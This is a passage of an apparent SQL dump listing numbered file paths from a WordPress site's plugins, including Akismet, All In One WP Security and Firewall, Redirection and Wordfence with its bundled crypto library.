lugins/akismet/views/activate.php'),(585,'wp-content/plugins/akismet/views/config.php'),(586,'wp-content/plugins/akismet/views/connect-jp.php'),(587,'wp-content/plugins/akismet/views/enter.php'),(588,'wp-content/plugins/akismet/views/get.php'),(589,'wp-content/plugins/akismet/views/notice.php'),(590,'wp-content/plugins/akismet/views/predefined.php'),(591,'wp-content/plugins/akismet/views/setup.php'),(592,'wp-content/plugins/akismet/views/start.php'),(593,'wp-content/plugins/akismet/views/stats.php'),(594,'wp-content/plugins/akismet/views/title.php'),(595,'wp-content/plugins/akismet/wrapper.php'),(596,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/general/wp-security-list-table.php'),(597,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/index.html'),(598,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/index.php'),(599,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-admin-init.php'),(600,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-admin-menu.php'),(601,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-blacklist-menu.php'),(602,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-brute-force-menu.php'),(603,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-dashboard-menu.php'),(604,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-database-menu.php'),(605,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-filescan-menu.php'),(606,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-filesystem-menu.php'),(607,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-firewall-menu.php'),(608,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-404.php'),(609,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-acct-activity.php'),(610,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-comment-spammer-ip.php'),(611,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-locked-ip.php'),(612,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-logged-in-users.php'),(613,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-login-fails.php'),(614,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-permanent-blocked-ip.php'),(615,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-registered-users.php'),(616,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-maintenance-menu.php'),(617,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-misc-options-menu.php'),(618,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-settings-menu.php'),(619,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-spam-menu.php'),(620,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-user-accounts-menu.php'),(621,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-user-login-menu.php'),(622,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-user-registration-menu.php'),(623,'wp-content/plugins/all-in-one-wp-security-and-firewall/backups/index.html'),(624,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/grade-system/wp-security-feature-item-manager.php'),(625,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/grade-system/wp-security-feature-item.php'),(626,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/index.html'),(627,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/index.php'),(628,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-backup.php'),(629,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-blocking.php'),(630,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-bot-protection.php'),(631,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-captcha.php'),(632,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-config.php'),(633,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-configure-settings.php'),(634,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-cronjob-handler.php'),(635,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-deactivation-tasks.php'),(636,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-debug-logger.php'),(637,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-file-scan.php'),(638,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-general-init-tasks.php'),(639,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-installer.php'),(640,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-process-renamed-login-page.php'),(641,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-user-login.php'),(642,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-user-registration.php'),(643,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility-file.php'),(644,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility-htaccess.php'),(645,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility-ip-address.php'),(646,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility.php'),(647,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-wp-footer-content.php'),(648,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-wp-loaded-tasks.php'),(649,'wp-content/plugins/all-in-one-wp-security-and-firewall/css/index.html'),(650,'wp-content/plugins/all-in-one-wp-security-and-firewall/css/wp-security-admin-styles.css'),(651,'wp-content/plugins/all-in-one-wp-security-and-firewall/css/wp-security-site-lockout-page.css'),(652,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/arrow.png'),(653,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/error.png'),(654,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/feature-difficulty-badge-bg.png'),(655,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/feature-points-badge-bg.png'),(656,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/form_bg.png'),(657,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/index.html'),(658,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/info-icon.png'),(659,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/loading.gif'),(660,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/plugin-icon.png'),(661,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/plugin-icon2.png'),(662,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/shield-info-icon-36.png'),(663,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/shield-security-icon-36.png'),(664,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/success.png'),(665,'wp-content/plugins/all-in-one-wp-security-and-firewall/index.html'),(666,'wp-content/plugins/all-in-one-wp-security-and-firewall/js/index.html'),(667,'wp-content/plugins/all-in-one-wp-security-and-firewall/js/password-strength-tool.js'),(668,'wp-content/plugins/all-in-one-wp-security-and-firewall/js/wp-security-admin-script.js'),(669,'wp-content/plugins/all-in-one-wp-security-and-firewall/lib/index.html'),(670,'wp-content/plugins/all-in-one-wp-security-and-firewall/license.txt'),(671,'wp-content/plugins/all-in-one-wp-security-and-firewall/logs/.htaccess'),(672,'wp-content/plugins/all-in-one-wp-security-and-firewall/logs/index.html'),(673,'wp-content/plugins/all-in-one-wp-security-and-firewall/logs/wp-security-log-cron-job.txt'),(674,'wp-content/plugins/all-in-one-wp-security-and-firewall/logs/wp-security-log.txt'),(675,'wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/index.html'),(676,'wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-rename-login-feature-pre-5-2.php'),(677,'wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-rename-login-feature-pre-5-7.php'),(678,'wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-rename-login-feature.php'),(679,'wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-stop-users-enumeration.php'),(680,'wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-unlock-request.php'),(681,'wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-visitor-lockout-page.php'),(682,'wp-content/plugins/all-in-one-wp-security-and-firewall/readme.txt'),(683,'wp-content/plugins/all-in-one-wp-security-and-firewall/wp-security-core.php'),(684,'wp-content/plugins/all-in-one-wp-security-and-firewall/wp-security.php'),(685,'wp-content/plugins/disable-gutenberg/css/font-icons.css'),(686,'wp-content/plugins/disable-gutenberg/css/settings.css'),(687,'wp-content/plugins/disable-gutenberg/disable-gutenberg.php'),(688,'wp-content/plugins/disable-gutenberg/fonts/awesome/fontawesome-webfont.eot'),(689,'wp-content/plugins/disable-gutenberg/fonts/awesome/fontawesome-webfont.svg'),(690,'wp-content/plugins/disable-gutenberg/fonts/awesome/fontawesome-webfont.ttf'),(691,'wp-content/plugins/disable-gutenberg/fonts/awesome/fontawesome-webfont.woff'),(692,'wp-content/plugins/disable-gutenberg/fonts/awesome/fontawesome-webfont.woff2'),(693,'wp-content/plugins/disable-gutenberg/inc/classic-editor.php'),(694,'wp-content/plugins/disable-gutenberg/inc/plugin-core.php'),(695,'wp-content/plugins/disable-gutenberg/inc/plugin-features.php'),(696,'wp-content/plugins/disable-gutenberg/inc/plugin-frontend.php'),(697,'wp-content/plugins/disable-gutenberg/inc/resources-enqueue.php'),(698,'wp-content/plugins/disable-gutenberg/inc/settings-display.php'),(699,'wp-content/plugins/disable-gutenberg/inc/settings-register.php'),(700,'wp-content/plugins/disable-gutenberg/inc/settings-reset.php'),(701,'wp-content/plugins/disable-gutenberg/js/settings.js'),(702,'wp-content/plugins/disable-gutenberg/languages/disable-gutenberg.pot'),(703,'wp-content/plugins/disable-gutenberg/readme.txt'),(704,'wp-content/plugins/disable-gutenberg/uninstall.php'),(705,'wp-content/plugins/hello.php'),(706,'wp-content/plugins/index.php'),(707,'wp-content/plugins/redirection/README.md'),(708,'wp-content/plugins/redirection/actions/error.php'),(709,'wp-content/plugins/redirection/actions/nothing.php'),(710,'wp-content/plugins/redirection/actions/pass.php'),(711,'wp-content/plugins/redirection/actions/random.php'),(712,'wp-content/plugins/redirection/actions/url.php'),(713,'wp-content/plugins/redirection/api/api-404.php'),(714,'wp-content/plugins/redirection/api/api-export.php'),(715,'wp-content/plugins/redirection/api/api-group.php'),(716,'wp-content/plugins/redirection/api/api-import.php'),(717,'wp-content/plugins/redirection/api/api-log.php'),(718,'wp-content/plugins/redirection/api/api-plugin.php'),(719,'wp-content/plugins/redirection/api/api-redirect.php'),(720,'wp-content/plugins/redirection/api/api-settings.php'),(721,'wp-content/plugins/redirection/fileio/apache.php'),(722,'wp-content/plugins/redirection/fileio/csv.php'),(723,'wp-content/plugins/redirection/fileio/json.php'),(724,'wp-content/plugins/redirection/fileio/nginx.php'),(725,'wp-content/plugins/redirection/fileio/rss.php'),(726,'wp-content/plugins/redirection/images/GitHub-Mark-64px.png'),(727,'wp-content/plugins/redirection/images/donate.gif'),(728,'wp-content/plugins/redirection/license.txt'),(729,'wp-content/plugins/redirection/locale/json/redirection-de_DE.json'),(730,'wp-content/plugins/redirection/locale/json/redirection-en_CA.json'),(731,'wp-content/plugins/redirection/locale/json/redirection-en_GB.json'),(732,'wp-content/plugins/redirection/locale/json/redirection-es_ES.json'),(733,'wp-content/plugins/redirection/locale/json/redirection-fr_FR.json'),(734,'wp-content/plugins/redirection/locale/json/redirection-it_IT.json'),(735,'wp-content/plugins/redirection/locale/json/redirection-ja.json'),(736,'wp-content/plugins/redirection/locale/json/redirection-sv_SE.json'),(737,'wp-content/plugins/redirection/locale/json/redirection-zh_TW.json'),(738,'wp-content/plugins/redirection/locale/redirection-de_DE.mo'),(739,'wp-content/plugins/redirection/locale/redirection-de_DE.po'),(740,'wp-content/plugins/redirection/locale/redirection-en_CA.mo'),(741,'wp-content/plugins/redirection/locale/redirection-en_CA.po'),(742,'wp-content/plugins/redirection/locale/redirection-en_GB.mo'),(743,'wp-content/plugins/redirection/locale/redirection-en_GB.po'),(744,'wp-content/plugins/redirection/locale/redirection-es_ES.mo'),(745,'wp-content/plugins/redirection/locale/redirection-es_ES.po'),(746,'wp-content/plugins/redirection/locale/redirection-fr_FR.mo'),(747,'wp-content/plugins/redirection/locale/redirection-fr_FR.po'),(748,'wp-content/plugins/redirection/locale/redirection-it_IT.mo'),(749,'wp-content/plugins/redirection/locale/redirection-it_IT.po'),(750,'wp-content/plugins/redirection/locale/redirection-ja.mo'),(751,'wp-content/plugins/redirection/locale/redirection-ja.po'),(752,'wp-content/plugins/redirection/locale/redirection-sv_SE.mo'),(753,'wp-content/plugins/redirection/locale/redirection-sv_SE.po'),(754,'wp-content/plugins/redirection/locale/redirection-zh_TW.mo'),(755,'wp-content/plugins/redirection/locale/redirection-zh_TW.po'),(756,'wp-content/plugins/redirection/locale/redirection.pot'),(757,'wp-content/plugins/redirection/matches/cookie.php'),(758,'wp-content/plugins/redirection/matches/custom-filter.php'),(759,'wp-content/plugins/redirection/matches/http-header.php'),(760,'wp-content/plugins/redirection/matches/login.php'),(761,'wp-content/plugins/redirection/matches/referrer.php'),(762,'wp-content/plugins/redirection/matches/url.php'),(763,'wp-content/plugins/redirection/matches/user-agent.php'),(764,'wp-content/plugins/redirection/models/action.php'),(765,'wp-content/plugins/redirection/models/database.php'),(766,'wp-content/plugins/redirection/models/file-io.php'),(767,'wp-content/plugins/redirection/models/fixer.php'),(768,'wp-content/plugins/redirection/models/flusher.php'),(769,'wp-content/plugins/redirection/models/group.php'),(770,'wp-content/plugins/redirection/models/importer.php'),(771,'wp-content/plugins/redirection/models/log.php'),(772,'wp-content/plugins/redirection/models/match.php'),(773,'wp-content/plugins/redirection/models/module.php'),(774,'wp-content/plugins/redirection/models/monitor.php'),(775,'wp-content/plugins/redirection/models/redirect.php'),(776,'wp-content/plugins/redirection/models/request.php'),(777,'wp-content/plugins/redirection/modules/apache.php'),(778,'wp-content/plugins/redirection/modules/nginx.php'),(779,'wp-content/plugins/redirection/modules/wordpress.php'),(780,'wp-content/plugins/redirection/readme.txt'),(781,'wp-content/plugins/redirection/redirection-admin.php'),(782,'wp-content/plugins/redirection/redirection-api.php'),(783,'wp-content/plugins/redirection/redirection-cli.php'),(784,'wp-content/plugins/redirection/redirection-front.php'),(785,'wp-content/plugins/redirection/redirection-settings.php'),(786,'wp-content/plugins/redirection/redirection-strings.php'),(787,'wp-content/plugins/redirection/redirection-version.php'),(788,'wp-content/plugins/redirection/redirection.css'),(789,'wp-content/plugins/redirection/redirection.js'),(790,'wp-content/plugins/redirection/redirection.php'),(791,'wp-content/plugins/wordfence/crypto/vendor/autoload.php'),(792,'wp-content/plugins/wordfence/crypto/vendor/composer/ClassLoader.php'),(793,'wp-content/plugins/wordfence/crypto/vendor/composer/InstalledVersions.php'),(794,'wp-content/plugins/wordfence/crypto/vendor/composer/LICENSE'),(795,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_classmap.php'),(796,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_files.php'),(797,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_namespaces.php'),(798,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_psr4.php'),(799,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_real.php'),(800,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_static.php'),(801,'wp-content/plugins/wordfence/crypto/vendor/composer/installed.json'),(802,'wp-content/plugins/wordfence/crypto/vendor/composer/installed.php'),(803,'wp-content/plugins/wordfence/crypto/vendor/composer/platform_check.php'),(804,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/LICENSE'),(805,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey'),(806,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey.asc'),(807,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/byte_safe_strings.php'),(808,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/cast_to_int.php'),(809,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/error_polyfill.php'),(810,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random.php'),(811,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_com_dotnet.php'),(812,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_dev_urandom.php'),(813,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium.php'),(814,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium_legacy.php'),(815,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_mcrypt.php'),(816,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_int.php'),(817,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/psalm-autoload.php'),(818,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/LICENSE'),(819,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-fast.php'),(820,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-pedantic.php'),(821,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-php7.php'),(822,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-phpunit.php'),(823,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload.php'),(824,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/composer-php52.json'),(825,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/constants.php'),(826,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/namespaced.php'),(827,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat.php'),(828,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat_const.php'),(829,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/sodium_compat.php'),(830,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Compat.php'),(831,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/BLAKE2b.php'),(832,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/Ctx.php'),(833,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php'),(834,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20.php'),(835,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Fe.php'),(836,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php'),(837,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php'),(838,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php'),(839,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php'),(840,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php'),(841,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/H.php'),(842,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519.php'),(843,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Ed25519.php'),(844,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HChaCha20.php'),(845,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HSalsa20.php'),(846,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305/State.php'),(847,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305.php'),(848,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Salsa20.php'),(849,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/SipHash.php'),(850,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Util.php'),(851,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/X25519.php'),(852,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/XChaCha20.php'),(853,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Xsalsa20.php'),(854,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Crypto.php'),(855,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/File.php'),(856,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/psalm-above-3.xml'),(857,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/psalm-below-3.xml'),(858,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Compat.php'),(859,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/BLAKE2b.php'),(860,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/Common.php'),(861,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/Original.php'),(862,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/UrlSafe.php'),(863,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/Ctx.php'),(864,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/IetfCtx.php'),(865,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20.php'),(866,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Fe.php'),(867,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Cached.php'),(868,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P1p1.php'),(869,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P2.php'),(870,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P3.php'),(871,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Precomp.php'),(872,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/H.php'),(873,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519.php'),(874,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Ed25519.php'),(875,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HChaCha20.php'),(876,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HSalsa20.php'),(877,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305/State.php'),(878,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305.php'),(879,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Salsa20.php'),(880,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SecretStream/State.php'),(881,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SipHash.php'),(882,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Util.php'),(883,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/X25519.php'),(884,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XChaCha20.php'),(885,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XSalsa20.php'),(886,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/BLAKE2b.php'),(887,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/Ctx.php'),(888,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/IetfCtx.php'),(889,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20.php'),(890,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Fe.php'),(891,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Cached.php'),(892,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php'),(893,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P2.php'),(894,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P3.php'),(895,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php'),(896,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/H.php'),(897,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519.php'),(898,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Ed25519.php'),(899,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HChaCha20.php'),(900,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HSalsa20.php'),(901,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int32.php'),(902,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int64.php'),(903,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305/State.php'),(904,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305.php'),(905,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Salsa20.php'),(906,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SecretStream/State.php'),(907,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SipHash.php'),(908,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Util.php'),(909,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/X25519.php'),(910,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XChaCha20.php'),(911,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XSalsa20.php'),(912,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto.php'),(913,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto32.php'),(914,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/File.php'),(915,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/PHP52/SplFixedArray.php'),(916,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/SodiumException.php'),(917,'wp-content/plugins/wordfence/css/activity-report-widget.1623076348.css'),(918,'wp-content/plugins/wordfence/css/diff.1623076348.css'),(919,'wp-content/plugins/wordfence/css/dt_table.1623076348.css'),(920,'wp-content/plugins/wordfence/css/fullLog.1623076348.css'),(921,'wp-content/plugins/wordfence/css/images/ui-icons_444444_256x240.png'),(922,'wp-content/plugins/wordfence/css/images/ui-icons_555555_256x240.png'),(923,'wp-content/plugins/wordfence/css/images/ui-icons_777620_256x240.png'),(924,'wp-content/plugins/wordfence/css/images/ui-icons_777777_256x240.png'),(925,'wp-content/plugins/wordfence/css/images/ui-icons_cc0000_256x240.png'),(926,'wp-content/plugins/wordfence/css/images/ui-icons_ffffff_256x240.png'),(927,'wp-content/plugins/wordfence/css/iptraf.1623076348.css'),(928,'wp-content/plugins/wordfence/css/jquery-ui-timepicker-addon.1623076348.css'),(929,'wp-content/plugins/wordfence/css/jquery-ui.min.1623076348.css'),(930,'wp-content/plugins/wordfence/css/jquery-ui.structure.min.1623076348.css'),(931,'wp-content/plugins/wordfence/css/jquery-ui.theme.min.1623076348.css'),(932,'wp-content/plugins/wordfence/css/main.1623076348.css'),(933,'wp-content/plugins/wordfence/css/phpinfo.1623076348.css'),(934,'wp-content/plugins/wordfence/css/wf-adminbar.1623076348.css'),(935,'wp-content/plugins/wordfence/css/wf-colorbox.1623076348.css'),(936,'wp-content/plugins/wordfence/css/wf-font-awesome.1623076348.css'),(937,'wp-content/plugins/wordfence/css/wf-global.1623076348.css'),(938,'wp-content/plugins/wordfence/css/wf-ionicons.1623076348.css'),(939,'wp-content/plugins/wordfence/css/wf-onboarding.1623076348.css'),(940,'wp-content/plugins/wordfence/css/wf-roboto-font.1623076348.css'),(941,'wp-content/plugins/wordfence/css/wfselect2.min.1623076348.css'),(942,'wp-content/plugins/wordfence/css/wordfenceBox.1623076348.css'),(943,'wp-content/plugins/wo